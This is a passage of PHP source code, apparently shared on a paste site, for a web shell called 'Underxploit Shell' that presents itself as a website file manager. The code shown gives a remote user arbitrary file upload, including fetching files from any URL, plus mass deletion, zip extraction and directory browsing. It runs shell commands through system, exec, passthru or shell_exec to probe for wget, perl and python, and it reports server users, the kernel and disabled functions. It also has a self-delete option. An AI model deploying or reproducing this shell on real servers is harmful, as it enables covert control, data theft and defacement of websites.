  539.     <td align='center' style='width:10%'><i class='fa fa-folder-o'></i> </td><td style='width:70%'><input type='text' value='".basename($dir)."' name='e'></td><td style='width:20%'>
  540.     <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
  541.     </form></div></div>");
  542. }
  543.  
  544. // --- delete directory --- //
  545. elseif($_COEG['command'] == 'deledir') {
  546. $x0z1 = deledir($dir);
  547.  if($x0z1) {
  548.         echo("<script>window.location = '?".x5.dirname($dir)."';</script>");
  549.     } else {
  550.         echo("<script>window.location = '?".x5.dirname($dir)."';</script>");
  551.         error('Permission Denied !!');
  552.     }
  553. }
  554.  
  555. elseif($_COEG['command'] == 'about') {
  556.   echo '<div class="coL-panel"><table>
  557. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">DESCRIPTION</td></table></div>';
  558. echo '<div class="coL-option" style="padding:7px"><br>
  559.     <center><img class="animasi infinite anim1" src="'.x4.'logo.jpg" style="width:150px;height:150px;border-radius:100%;border:1px solid #ddd;padding:2px"></center><br><hr>
  560. &nbsp; &nbsp; Underxploit Shell adalah sebuah script filemanager website yang dapat memudahkan anda mengatur isi dari website yang anda kelola, dan pastinya saya rancang sangat responsive dan mudah di akses via apa saja.
  561. <br><br>
  562. &nbsp; &nbsp; Shell ini adalah recoded dari shell sebelumnya yaitu Mobile Shell V.05, untuk versi ini tidak ada tools hacking, namun hanya mengoptimalkan fitur filemanagernya saja seperti edit, delete, copy dll.
  563. <br><br>
  564. &nbsp; &nbsp; Berbeda dengan Mobile Shell V.05, pada shell ini ada beberapa perubahan tampilan pada background, font, panel icon, cover, navigasi, alert, dan form login.
  565. </div>
  566.  
  567. <div class="coL-panel top"><table>
  568. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">CREDITS</td></table></div>
  569. <table class="table-info">
  570. <tr class="ex-hov">
  571. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Name</td> <td class="td-info">: Underxploit Shell</td>
  572. <tr class="ex-hov">
  573. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Version</td> <td class="td-info">: 0.1 (Beta)</td>
  574. <tr class="ex-hov">
  575. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Author</td> <td class="td-info">: Wildan Izzudin</td>
  576. <tr class="ex-hov">
  577. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Email</td> <td class="td-info break">: <a class="a" href="mailto:underxploit@gmail.com">underxploit@gmail.com</a></td>
  578. <tr class="ex-hov">
  579. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Facebook</td> <td class="td-info break">:  <a class="a" href="http://www.facebook.com/WILDAN.OFFICIAL">http://fb.me/WILDAN.OFFICIAL</a></td>
  580. <tr class="ex-hov">
  581. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Blog</td> <td class="td-info">: <a class="a" href="http://underxploit.blogspot.co.id">http://underxploit.blogspot.co.id</a></td></table>
  582. <div class="coL-option to">
  583. <center><br>If there is any suggestion or feedback please contact me through the contact above.<br><br><center><br>&mdash; Thank You &mdash;</center></div></div>';
  584. }
  585.  
  586. elseif($_COEG['command'] == 'upload') {
  587. echo '<div class="coL-panel"><table>
  588. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">MULTIPLE UPLOAD</td></table></div>';
  589. if(isset($_REQUEST['ufile'])) {
  590. $ufile = $_COEG['ufile'] ;
  591. }
  592. if(isset($_REQUEST['upload'])) {
  593. if($_COEG['upload']){
  594. if(empty($ufile)) {
  595.     $cx = $_FILES['file']['name'];
  596. } else {
  597.     $cx = $ufile;
  598. }
  599. if(@copy($_FILES['file']['tmp_name'],$dir.'/'.$cx)) {
  600. success('File Uploaded !!');
  601. } else {
  602. error('Upload Failed !!');
  603.           } } }
  604. echo '<div class="coL-option"><span class="label-default">+</span> Upload From Device :<hr>';
  605. echo '<form enctype="multipart/form-data" action="?'.x7.'upload&'.x5.$dir.'"   method="POST" style="margin:0px">
  606. <table style="width:100%">
  607. <td style="width:20%">File :</td>
  608. <td style="width:80%">
  609. <input type="file" name="file"></td>
  610. <tr>
  611. <td style="width:20%">Name :</td>
  612. <td style="width:80%"><input name="ufile" type="text" placeholder="" value="" /></td>
  613. <tr>
  614. <td style="width:20%"></td>
  615. <td style="width:80%"><input type="submit" name="upload" style="width:100px" value="Upload" class="btn-exe" />
  616. </td></table></form></div>';
  617.  
  618. if($_COEG["submit"]){
  619. $uname = $_COEG["uname"];
  620. $url = trim($_COEG["url"]);
  621. if($url){
  622. $file = fopen($url,"rb");
  623. if($file) {
  624. $valid_exts = array("css","php","html","htm","txt","zip","rar","png","jpg","jpeg","gif","mp3","mp4","3gp");
  625. $ext = end(explode(".",strtolower(basename($url))));
  626. if(in_array($ext,$valid_exts)){
  627. if(empty($uname)) {
  628.      $filename = basename($url);
  629.  } else {
  630.     $filename = $uname;
  631. }
  632. $newfile = fopen($dir.'/'.$filename, "wb");
  633. if($newfile){
  634. while(!feof($file)) {
  635. fwrite($newfile,fread($file,MS7Z), MS7Z);  }
  636. success('File Uploaded !!');
  637.  } else {
  638. error('Upload Failed !!');
  639.  } } else { error('Extension Not Supported !!');
  640. } } else { error('Link Invalid !!'); } } else { error('Link Empty !!');
  641. } }
  642. echo '<div class="coL-option top"><span class="label-default">+</span> Upload From Internet :<hr>';
  643. echo '<form action="?'.x7.'upload&'.x5.$dir.'"  method="POST">';
  644. echo '<table style="width:100%">
  645. <td style="width:20%">Link :</td>
  646. <td style="width:80%"><input type="text" name="url" placeholder="" style="width:100%"></td>
  647. <tr>
  648. <td style="width:20%">Name :</td>
  649. <td style="width:80%"><input type="text" name="uname" style="width:100%"></td>
  650. <tr>
  651. <td style="width:20%"></td><td style="width:80%"><input type="submit" name="submit" style="width:100px" value="Upload" class="btn-exe"></td></table></form>
  652. </div></div>';
  653. }
  654.  
  655. // --- system information --- //
  656. elseif ($_COEG['command'] == 'system') {
  657. function exe($ms_x) {  
  658. if(function_exists('system')) {        
  659.         @ob_start();       
  660.         @system($ms_x);        
  661.         $ms_z = @ob_get_contents();        
  662.         @ob_end_clean();       
  663.         return $ms_z;  
  664.     } elseif(function_exists('exec')) {        
  665.         @exec($ms_x,$values);      
  666.         $ms_z = "";        
  667.         foreach($values as $value) {           
  668.             $ms_z .= $result;      
  669.         } return $ms_z;    
  670.     } elseif(function_exists('passthru')) {        
  671.         @ob_start();       
  672.         @passthru($ms_x);      
  673.         $ms_z = @ob_get_contents();        
  674.         @ob_end_clean();       
  675.         return $ms_z;  
  676.     } elseif(function_exists('shell_exec')) {      
  677.         $ms_z = @shell_exec($ms_x);        
  678.         return $ms_z;  
  679.     }
  680. }
  681. function disk($dz) {
  682. if($dz >= 1073741824)
  683. return sprintf('%1.2f',$dz / 1073741824 ).' GB';
  684. elseif($dz >= 1048576)
  685. return sprintf('%1.2f',$dz / 1048576 ) .' MB';
  686. elseif($dz >= 1024)
  687. return sprintf('%1.2f',$dz / 1024 ) .' KB';
  688. else
  689. return $dz .' B';
  690. }
  691. function fuck($b_ms, $c_ms, $d_ms){
  692.     if(strpos($b_ms, $c_ms) === FALSE) return FALSE;
  693.     if(strpos($b_ms, $d_ms) === FALSE) return FALSE;
  694.     $a_ms = strpos($b_ms, $c_ms) + strlen($c_ms);
  695.     $e_ms = strpos($b_ms, $d_ms, $a_ms);
  696.     $f_ms = substr($b_ms, $a_ms, $e_ms - $a_ms);
  697.     return $f_ms; }
  698. if(get_magic_quotes_gpc()) {
  699. function m_ms($n_ms) {
  700. return is_array($n_ms) ? array_map('m_ms', $n_ms) : stripslashes($n_ms); }
  701. $_COEG = m_ms($_COEG); }
  702.  
  703. $safemode = (@ini_get(strtolower("safe_mode")) == 'on') ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
  704.  
  705. $disablefunc = @ini_get("disable_functions");
  706. $mysql = (function_exists('mysql_connect')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
  707.  
  708. $curl = (function_exists('curl_version')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</font>";
  709.  
  710. $wget = (exe('wget --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
  711.  
  712. $perl = (exe('perl --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</font>";
  713.  
  714. $python = (exe('python --help')) ? "
  715. <span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
  716.  
  717. $ds_men = (!empty($disablefunc)) ? "<span class='label-danger'>".$disablefunc."</span>" : "<span class='label-success'>NONE</span>";
  718. if(!function_exists('posix_getegid')) {
  719.     $c_us = @get_current_user();
  720.     $c_id = @getmyuid();
  721.     $g_c = @getmygid();
  722.     $gr_p = "?";
  723. } else {
  724.     $c_id = @posix_getpwuid(posix_geteuid());
  725.     $g_c = @posix_getgrgid(posix_getegid());
  726.     $c_us = $c_id['name'];
  727.     $c_id = $c_id['uid'];
  728.     $gr_p = $g_c['name'];
  729.     $g_c = $g_c['gid'];
  730. }
  731. echo '<div class="coL-panel"><table>
  732. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">SYSTEM INFORMATION</td></table></div>';
  733. echo "<table width=100% class='table-info' cellspacing=0>
  734. <th class=th-info style=width:120px><center>Component</center></th>
  735. <th class=th-info><center>Arrow</center></th>
  736. <th class=th-info break><center>Result</center></th></tr>";
  737. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Server </td><td class='td-info' align='center'>&raquo;</td>
  738. <td class='td-info'> ".$_SERVER['SERVER_SOFTWARE']."</td></tr>";
  739. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  740. Username</td><td class='td-info' align='center'>&raquo;</td>
  741. <td class='td-info'> ".$c_us." [".$c_id."]</td></tr>";
  742. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  743. Group</td><td class='td-info' align='center'>&raquo;</td>
  744. <td class='td-info'>".$gr_p." [".$g_c."]</td></tr>";
  745. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  746. Server IP </td><td class='td-info' align='center'>&raquo;</td>
  747. <td class='td-info'>".gethostbyname($_SERVER['HTTP_HOST'])."</td></tr>";
  748. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  749. Your IP </td><td class='td-info' align='center'>&raquo;</td>
  750. <td class='td-info'> ".$_SERVER['REMOTE_ADDR']."</td></tr>";
  751. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  752. PHP Version</td><td class='td-info' align='center'>&raquo;</td>
  753. <td class='td-info'> ".@phpversion()."</td></tr>";
  754. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Disk Space</td> <td class='td-info' align='center'>&raquo;</td>
  755. <td class='td-info'>[".disk(disk_free_space("/"))."] / [".disk(disk_total_space("/"))."]</td></tr>";
  756. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Safe Mode</td><td class='td-info' align='center'>&raquo;</td>
  757. <td class='td-info'> $safemode</td></tr>";
  758. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> MySQL</td><td class='td-info' align='center'>&raquo;</td><td class='td-info'>$mysql</td></tr>";
  759. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  760. Perl</td><td class='td-info' align='center'>&raquo;</td>
  761. <td class='td-info'> $perl </td></tr>";
  762. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Python</td><td class='td-info' align='center'>&raquo;</td>
  763. <td class='td-info'>$python</td></tr>";
  764. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> WGET</td><td class='td-info' align='center'>&raquo;</td>
  765. <td class='td-info'>$wget</td></tr>";
  766. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> CURL</td><td class='td-info' align='center'>&raquo;</td><td class='td-info'>$curl</td></tr>";
  767.  if(get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on") {
  768.   echo "<tr class='ex-hov'><td align='left' class='td-info'><span class='label label-default'>+</span> Magic Quotes  </td><td class='td-info' align='center'>&raquo;</td>
  769. <td><span class='label label-success'>ON</span></tr>"; } else { echo "<tr class='ex-hov'><td align='left' class='td-info'><span class='label label-default'>+</span> Magic Quotes  </td><td class='td-info' align='center'>&raquo;</td><td class='td-info'><span class='label label-danger'>OFF</span></td></tr>"; }
  770. echo "</table>";  
  771. echo '<div class="coL-panel top"><table>
  772. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">KERNEL</td></table></div>';
  773. echo "<div class ='coL-option' style='margin-bottom:3px;padding:7px'>".php_uname()."</div>";
  774. echo '<div class="coL-panel top"><table>
  775. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">DISABLE FUNCTION</td></table></div>';
  776. echo "<div class='coL-option' style='padding:7px'>".$ds_men."</div></div>";
  777. }
  778.  
  779. // --- mass action --- //
  780. else {
  781. $hc = @getcwd();
  782. if(isset($_COEG['location']))
  783.     @chdir($_COEG['location']);
  784. $cwd = @getcwd();
  785. if($os == 'win') {
  786.     $hc = str_replace("\\", "/", $hc);
  787.     $cwd = str_replace("\\", "/", $cwd);
  788. }
  789. if($cwd[strlen($cwd)-1] != '/')
  790.     $cwd .= '/';
  791.  
  792. function hs($d) {
  793.     if(function_exists("scandir")) {
  794.         return scandir($d);
  795.     } else {
  796.         $dh  = opendir($d);
  797.         while (false !== ($filename = readdir($dh)))
  798.             $data[] = $filename;
  799.         return $data;
  800.     }
  801. }
  802.   if(!empty($_COOKIE['msv5']))
  803.         $_COOKIE['msv5'] = @unserialize($_COOKIE['msv5']);
  804.      
  805.     if(!empty($_COEG['hcx'])) {
  806.         switch($_COEG['hcx']) {
  807.             case 'mkdir':
  808.                 if(!@mkdir($_COEG['p2']))
  809.                     echo "Can't create new dir";
  810.                 break;
  811.             case 'delete':
  812.                 function deleteDir($path) {
  813.                     $path = (substr($path,-1)=='/') ? $path:$path.'/';
  814.                     $dh  = opendir($path);
  815.                     while ( ($▟ = readdir($dh) ) !== false) {
  816.                         $▟ = $path.$▟;
  817.                         if ( (basename($▟) == "..") || (basename($▟) == ".") )
  818.                             continue;
  819.                         $type = filetype($▟);
  820.                         if ($type == "dir")
  821.                             deleteDir($▟);
  822.                         else
  823.                             @unlink($▟);
  824.                     }
  825.                     closedir($dh);
  826.                     @rmdir($path);
  827.                 }
  828.                 if(is_array(@$_COEG['msv5']))
  829.                     foreach($_COEG['msv5'] as $f) {
  830.                         if($f == '..')
  831.                             continue;
  832.                         $f = urldecode($f);
  833.                         if(is_dir($f))
  834.                             deleteDir($f);
  835.                         else
  836.                             @unlink($f);
  837.                     }
  838.                 break;
  839.             case 'paste':
  840.                 if($_COOKIE['act'] == 'copy') {
  841.                     function copy_paste($c,$s,$d){
  842.                         if(is_dir($c.$s)){
  843.                             mkdir($d.$s);
  844.                             $h = @opendir($c.$s);
  845.                             while (($f = @readdir($h)) !== false)
  846.                                 if (($f != ".") and ($f != ".."))
  847.                                     copy_paste($c.$s.'/',$f, $d.$s.'/');
  848.                         } elseif(is_file($c.$s))
  849.                             @copy($c.$s, $d.$s);
  850.                     }
  851.                     foreach($_COOKIE['msv5'] as $f)
  852.                         copy_paste($_COOKIE['location'],$f, $GLOBALS['cwd']);
  853.                 } elseif($_COOKIE['act'] == 'move') {
  854.                     function move_paste($c,$s,$d){
  855.                         if(is_dir($c.$s)){
  856.                             mkdir($d.$s);
  857.                             $h = @opendir($c.$s);
  858.                             while (($f = @readdir($h)) !== false)
  859.                                 if (($f != ".") and ($f != ".."))
  860.                                     copy_paste($c.$s.'/',$f, $d.$s.'/');
  861.                         } elseif(@is_file($c.$s))
  862.                             @copy($c.$s, $d.$s);
  863.                     }
  864.                     foreach($_COOKIE['msv5'] as $f)
  865.                         @rename($_COOKIE['location'].$f, $GLOBALS['cwd'].$f);
  866.                 } elseif($_COOKIE['act'] == 'zip') {
  867.                     if(class_exists('ZipArchive')) {
  868.                         $zip = new ZipArchive();
  869.                         if ($zip->open($_COEG['p2'], 1)) {
  870.                             chdir($_COOKIE['location']);
  871.                             foreach($_COOKIE['msv5'] as $f) {
  872.                                 if($f == '..')
  873.                                     continue;
  874.                                 if(@is_file($_COOKIE['location'].$f))
  875.                                     $zip->addFile($_COOKIE['location'].$f, $f);
  876.                                 elseif(@is_dir($_COOKIE['location'].$f)) {
  877.                                     $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
  878.                                     foreach ($iterator as $key=>$value) {
  879.                                         $zip->addFile(realpath($key), $key);
  880.                                     }
  881.                                 }
  882.                             }
  883.                             chdir($GLOBALS['cwd']);
  884.                             $zip->close();
  885.                         }
  886.                     }
  887.                 } elseif($_COOKIE['act'] == 'unzip') {
  888.                     if(class_exists('ZipArchive')) {
  889.                         $zip = new ZipArchive();
  890.                         foreach($_COOKIE['msv5'] as $f) {
  891.                             if($zip->open($_COOKIE['location'].$f)) {
  892.                                 $zip->extractTo($GLOBALS['cwd']);
  893.                                 $zip->close();
  894.                             }
  895.                         }
  896.                     }
  897.                 } elseif($_COOKIE['act'] == 'tar') {
  898.                     chdir($_COOKIE['location']);
  899.                     $_COOKIE['msv5'] = array_map('escapeshellarg', $_COOKIE['msv5']);
  900.                     ex('tar cfzv ' . escapeshellarg($_COEG['p2']) . ' ' . implode(' ', $_COOKIE['msv5']));
  901.                     chdir($GLOBALS['cwd']);
  902.                 }
  903.                 unset($_COOKIE['msv5']);
  904.                 setcookie('msv5', '', time() - 3600);
  905.                 break;
  906.             default:
  907.                 if(!empty($_COEG['hcx'])) {
  908.                     vb('act', $_COEG['hcx']);
  909.                     vb('msv5', serialize(@$_COEG['msv5']));
  910.                     vb('location', @$_COEG['location']);
  911.                 }
  912.                 break;
  913.         }
  914.     }
  915. echo('<script>function m1s(){
  916. if(document.getElementById("act").value == ""){');
  917.    s('Select Action !!');
  918.     echo('  return false;
  919.    }
  920.    document.getElementById("sks").submit();
  921.  }
  922. </script>');
  923. echo('<form name="data" action="?dir='.$dir.'" method="POST" style="margin:0px">');
  924. echo('<div class="coL-panel"><table>
  925. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">FILE MANAGER</td></table></div>');
  926.        
  927.     $dirContent = hs(isset($_COEG['location'])?$_COEG['location']:$GLOBALS['cwd']);
  928.     if($dirContent === false) {    echo 'Can\'t open this folder!';hardFooter(); return; }
  929.     global $sort;
  930.     $sort = array('name', 1);
  931.     if(!empty($_COEG['hcx'])) {
  932.         if(preg_match('!s_([A-z]+)_(\d{1})!', $_COEG['hcx'], $match))
  933.             $sort = array($match[1], (int)$match[2]);
  934.     }
  935. echo('<script language="JavaScript">
  936. function toggle(source) {
  937.  checkboxes = document.getElementsByName("msv5[]");
  938.  for(var i=0, n=checkboxes.length;i<n;i++) {
  939.    checkboxes[i].checked = source.checked;
  940.  }
  941. }
  942. </script>');
  943. echo('<table class="table-file" cellspacing="0">
  944. <th class="th-file">Name</th>
  945. <th class="th-file" style="width:80px">Size</th>
  946. <th class="th-file" style="width:65px">Action</th>
  947. <th class="th-file"></th>
  948. <tr>');
  949. $dir = getcwd();
  950. $scn = scandir($dir);
  951.         foreach($scn as $dirx) {
  952.         $dtype = filetype("$dir/$dirx");
  953.  if(!is_dir("$dir/$dirx")) continue;
  954.             if($dirx === '..') {
  955.                 $href = '<a class="a" onclick=\'c("?'.x5.dirname($dir).'")\'>'.$dirx.'</a>';
  956.             }
  957. elseif($dirx === '.') {
  958.                 $href = '<a class="a" onclick=\'c("?'.x5.$dir.'")\'>'.$dirx.'</a>';
  959.             } else {
  960.                 $href = '<a class="a" onclick=\'c("?dir='.$dir.'/'.$dirx.'")\'>'.$dirx.'</a>';
  961.             }
  962.             if($dirx === '.' || $dirx === '..') {
  963.                 $d_zx = "<font color='#ddd'>--</font>";
  964.                 $ckh = '<input type="checkbox" disabled>';
  965.             } else {
  966.                 $d_zx = '<a class="a" onclick=\'c("?command=upload&dir='.$dir.'/'.$dirx.'")\'>U</a> |
  967. <a class="a" onclick=\'c("?command=renadir&dir='.$dir.'/'.$dirx.'")\'>R</a> | <a class="a" onclick=\'c("?command=deledir&dir='.$dir.'/'.$dirx.'")\'>D</a>';
  968.                 $ckh = '<input type="checkbox" value="'.basename($dirx).'" name="msv5[]">';
  969.             }
  970.  echo "<tr class='ex-hov'>";
  971.             echo "<td class='td-file break'><i class='fa fa-folder-o'></i>&nbsp;[ $href
  972. ]</td>";
  973.     echo "<td align='center' class='td-file'><center>--</center></th>";
  974.     echo "<td align='center' class='td-file'>$d_zx</td>";
  975.     echo "<td align='center' class='td-file' style='width:10px'>".$ckh."</td>";
  976.         }
  977.         echo "</tr>";
  978. foreach($scn as $file) {
  979.             $ftype = filetype("$dir/$file");
  980.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  981.             $size = filesize("$dir/$file")/1024;
  982.             $size = round($size,3);
  983.             if($size > 1024) {
  984.                 $size = round($size/1024,2). 'MB';
  985.             } else {
  986.                 $size = $size. 'KB';
  987.             }
  988.             if(!is_file("$dir/$file")) continue;
  989.             echo "<tr class='ex-hov'>";
  990.             echo '<td class=\'td-file break\'><i class="fa fa-file-o"></i>&nbsp;<a class="a" onclick="c(\'?'.x7.'view&'.x5.$dir.'&'.x6.$dir.'/'.$file.'\')">'.$file.'</a></td>';
  991.             echo "<td align='center' class='td-file'>$size</td>";
  992.             echo "<td align='center' class='td-file'>";
  993.             echo '<a class="a" href="?command=edit&dir='.$dir.'&file='.$dir.'/'.$file.'">OPEN</a></td>';
  994.             echo "<td align='center' class='td-file' style='width:10px'><input type='checkbox' name='msv5[]' value='".$file."'> </td>";
  995. }
  996.     echo "</table><table style='width:100%;margin-top:2px' cellspacing='0'>
  997. <td style='width:10%;text-align:left;padding-left:7px'><input type=checkbox onClick=toggle(this)></td>
  998.    <input type=hidden name=ne value=''>
  999.    <input type=hidden name=location value='" . htmlspecialchars($GLOBALS['cwd']) . "'>
  1000.    <input type=hidden name=charset value='". (isset($_COEG['charset'])?$_COEG['charset']:'')."'>
  1001.    <td style='width:70%'><select name='hcx' style='width:100%' id='act'>";
  1002.  if(!empty($_COOKIE['act']) && @count($_COOKIE['msv5']))
  1003.     echo("<option value='paste'>Paste</option>");
  1004.     echo("<option value=''>-- Select Action --</option><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>");
  1005. if(class_exists('ZipArchive'))
  1006.     echo("<option value='zip'>Compress (.zip)</option>");
  1007.     echo("</select></td>");
  1008.     if(!empty($_COOKIE['act']) && @count($_COOKIE['msv5']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
  1009.     echo("<input class='top' type=text name=p2 value='".rand(0,100)."-" . date("Y-m-d") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>");
  1010.     echo "<td style='width:20%;text-align:right'><button type='submit' onclick='m1s(); return false;' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></form></table>";
  1011.    if(isset($_COEG['ndir'])) {
  1012.     $cdir = $_COEG['newinput'];
  1013.     if (is_dir($dir.'/'.$cdir)) {
  1014. error('Directory Already Exist !!');
  1015.     } else {
  1016.         if(mkdir($dir.'/'.$cdir, 0777)) {
  1017.     echo('<script>c("?'.x5.$dir.'");</script>');;
  1018.         } else {
  1019. error('Can\'t Create Directory !!');  } } }
  1020. if(isset($_COEG['nfil'])) {
  1021.     $cfile = $_COEG['newinput'];
  1022.     if (file_exists($dir.'/'.$cfile)) {
  1023.   error('File Already Exist !!');
  1024.     } else {
  1025.         if(fopen($dir.'/'.$cfile, "w+")) {
  1026.       echo('<script>c("?'.x7.'edit&'.x5.$dir.'&'.x6.$dir.'/'.$cfile.'");</script>');
  1027.         } else {
  1028. error('Can\'t Create File !!');
  1029.         }
  1030.     }
  1031. }
  1032. echo('<script language="Javascript">
  1033.         function cog(){
  1034. if(document.forms[\'new\'].newinput.value === "") {');
  1035.     s('Can\'t Be Empty !!');
  1036.     echo('return false;
  1037.     }
  1038. }
  1039. </script>');
  1040. echo('<script type="text/javascript">
  1041. function valid(field) {
  1042.        var re = /^[0-9-A-z.]*$/;
  1043.        if (!re.test(field.value)) {');
  1044.             s('Invalid Name !!');
  1045.             echo('field.value = field.value.replace(/[^0-9-A-z.]/g,"");
  1046.        }
  1047.    }
  1048. </script>');
  1049.     echo('<table style="margin-top:3px" cellspacing="0"><form name="new" action="?'.x5.$dir.'" method="post">
  1050.     <td>
  1051. <input type="text" name="newinput" onkeyup="valid(this);"></td>
  1052. <td><button type="submit" class="btn-exe" name="ndir" onclick="return cog();"><i class="fa fa-folder-o"></i></button></td>
  1053. <td><button type="submit" class="btn-exe" name="nfil" onclick="return cog();"><i class="fa fa-file-o"></i></button></td></form></table></div>');
  1054. }
  1055. echo('<div class="coR">
  1056.            <div class="coR-panel"><table>
  1057. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">TOOLS</td></table></div><div class="tools-content">');
  1058. $path = getcwd();
  1059. if(isset($_FILES['data'])) {
  1060. if(copy($_FILES['data']['tmp_name'],$path.'/'.$_FILES['data']['name'])) {
  1061.     success('File Uploaded !!');
  1062.     mtr('?'.x5.$dir);
  1063. } else {
  1064.     error('Upload Failed !!');
  1065.     }
  1066. }
  1067. echo '<script>function upload(){
  1068. if(document.getElementById("up").value == ""){';
  1069.       s('Select Your File !!');
  1070.    echo('return false;
  1071.    }
  1072.    document.getElementById("%").submit();
  1073.  }
  1074. </script>');
  1075. echo '<table>
  1076. <td align="center" valign="top" style="width:10%;padding-top:11px"><i class="fa fa-bookmark-o"></i></td><td style="width:70%"><form enctype="multipart/form-data" action="?'.x5.$dir.'" method="POST"><input type="file" name="data" id="up"></td><td style="width:20%" valign="top"><button type="submit" class="btn-exe" onclick="upload();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td></table>';
  1077. if(isset($_COEG['x'])) {
  1078. $rse = $_COEG['file_name'];
  1079. $zip = new ZipArchive ;
  1080. if($zip ->open($path.'/'.$rse) === TRUE) {
  1081. $zip ->extractTo($path);
  1082. $zip ->close();
  1083.     success('[ '.$rse.' ] Extracted !!');
  1084.     mtr('?'.x5.$dir);
  1085. } else {
  1086.     error('Permission Denied !!');
  1087.     }
  1088. }
  1089. echo('<script>function unzip(){
  1090. if(document.getElementById("u").value == ""){');
  1091.       s('Select File [.zip] !!');
  1092.    echo('return false;
  1093.    }
  1094.    document.getElementById("sks").submit();
  1095.  }
  1096. </script>');
  1097. echo '<table>
  1098. <form method="POST" action="?'.x5.$dir.'">
  1099. <td align="center" style="width:10%"><i class="fa fa-bookmark-o"></i></td>
  1100. <td style="width:70%"><select name="file_name" id="u">
  1101. <option value=""> -- Choose File --</option>';
  1102. $scandir = scandir($path);
  1103. foreach($scandir as $file){
  1104. if(!is_file("$path/$file")) continue;
  1105. if(preg_match('/\.zip$/mis',$file)) {
  1106. echo '<option>'.$file.'</option>';
  1107.     }
  1108. }
  1109. echo '</select></td><td style="width:20%;text-align:right"><button type="submit" name="x" class="btn-exe" onclick="unzip();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td></table>';
  1110.  
  1111. echo('</div>');
  1112. echo('<div class="coR-panel top"><table>
  1113. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">MENU</td></table></div>
  1114. <div class="tools-content">');
  1115. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">System Information</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'system&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  1116. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Multiple Upload</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'upload&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  1117. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Change Password</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'change&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  1118. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Me : [ <font color="lime">'.str_replace('/', '', basename($_SERVER['PHP_SELF'])).' </font> ]</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'kill&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-trash"></i></button></a></td></table>');
  1119. echo('</div></div></div><div class="top"><div class="footer">CODED BY WILDAN IZZUDIN</div></div>');
  1120. ?>
RAW Paste Data